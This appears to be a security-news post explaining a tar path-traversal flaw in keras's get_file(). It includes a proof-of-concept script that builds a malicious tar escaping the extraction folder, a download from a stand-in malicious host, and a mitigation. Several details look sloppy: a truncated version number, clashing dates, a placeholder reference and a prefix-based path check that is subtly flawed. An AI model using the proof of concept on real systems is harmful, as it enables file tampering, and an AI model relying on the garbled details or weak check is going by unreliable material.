CVE CyberSecurity Database News

CVE-2024-55459 - How a keras 3.7. Vulnerability Lets Attackers Write Files On Your Machine

Poster -

In June 2024, a significant security vulnerability (CVE-2024-55459) was discovered in the popular machine learning library keras. This bug lets attackers write files—any files—to your computer simply by tricking your program into downloading a carefully crafted .tar archive using keras’s own keras.utils.get_file() method.

In this post, we’ll break down

* What CVE-2024-55459 is and how it works
* Simple code snippets illustrating the problem
* How an exploit might look in the wild
* How to protect yourself

What’s The Problem?

Keras is used by millions of developers every day for deep learning. At some point you might have used this code and trusted it:

import keras

keras.utils.get_file("model.tar", "https://example.com/model.tar";, extract=True)

The bug:
keras 3.7.’s get_file function failed to check the paths of the files it was extracting from .tar archives. If a tar file has “absolute” or “relative” paths (like ../../evil.txt or /etc/passwd), keras would happily unpack these files outside the intended folder—straight into sensitive places on your disk. This is known as a tar path traversal or a “zip slip” vulnerability.

Why Is This Dangerous?

An attacker could upload a malicious .tar file and make you or your code download it. Once extracted, the contents could overwrite critical files, drop malware, or otherwise hijack your computer. Anything the Python process can write, the attacker *can* write!

1. Crafting a Malicious .tar File

Suppose you want to write a file called /tmp/owned.txt with the contents "Gotcha!".

Here’s how you’d make the malicious tar

import tarfile

malicious_file_path = "../../tmp/owned.txt"  # This path escapes extraction dir
with tarfile.open("attack.tar", "w") as tar:
    with open("owned.txt", "w") as f:
        f.write("Gotcha!")
    tar.add("owned.txt", arcname=malicious_file_path)

2. Hosting the File

You upload attack.tar to your own server or a public file-sharing site and share the link.

Now, the victim’s code runs

from keras.utils import get_file

get_file("somefile", "https://your-malicious.site/attack.tar";, extract=True)

4. Result

The function downloads and extracts *all* files—including the malicious ../../tmp/owned.txt, thus writing “Gotcha!” outside the intended folder, in /tmp/.

Depending on what you put in the tarball, this could overwrite Python code, inject a shell script, or more.

Original References

* CVE-2024-55459 on NVD
* keras commit fixing the bug
* keras GitHub Issue #XXX (example placeholder)
* Full Advisory *(Update with actual links when available)*

How Is It Fixed?

The fix is simple: After this commit, keras checks that every file’s extraction path stays inside the intended directory and skips any file that tries to escape (either by ../, or absolute paths). This is generally done by checking the real path after joining to the extract directory.

Code snippet for safe extraction (simplified)

import os

def is_within_directory(directory, target):
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    return abs_target.startswith(abs_directory)

def safe_extract(tar, path="."):
    for member in tar.getmembers():
        file_path = os.path.join(path, member.name)
        if not is_within_directory(path, file_path):
            raise Exception("Attempted Path Traversal in Tar File")
    tar.extractall(path)

How To Protect Yourself

* Upgrade keras: Use keras 3.7.1 or above.
* Verify sources: Only use get_file with URLs you trust.
* Audit your code: Search for uses of get_file(..., extract=True) and check for potential exposure.
* Scan for unexpected files: If you’ve processed models from untrusted sources, review files in your project/work directories.

TLDR

keras 3.7. allowed attackers to write arbitrary files anywhere on your machine if you downloaded and extracted a malicious tarball via keras.utils.get_file(). This could result in code execution or data tampering!

Action: Upgrade keras immediately and be cautious with files/models from unknown sources.

* NVD entry
* keras source code

Timeline

Published on: 01/08/2025 17:15:15 UTC
Last modified on: 01/09/2025 15:15:18 UTC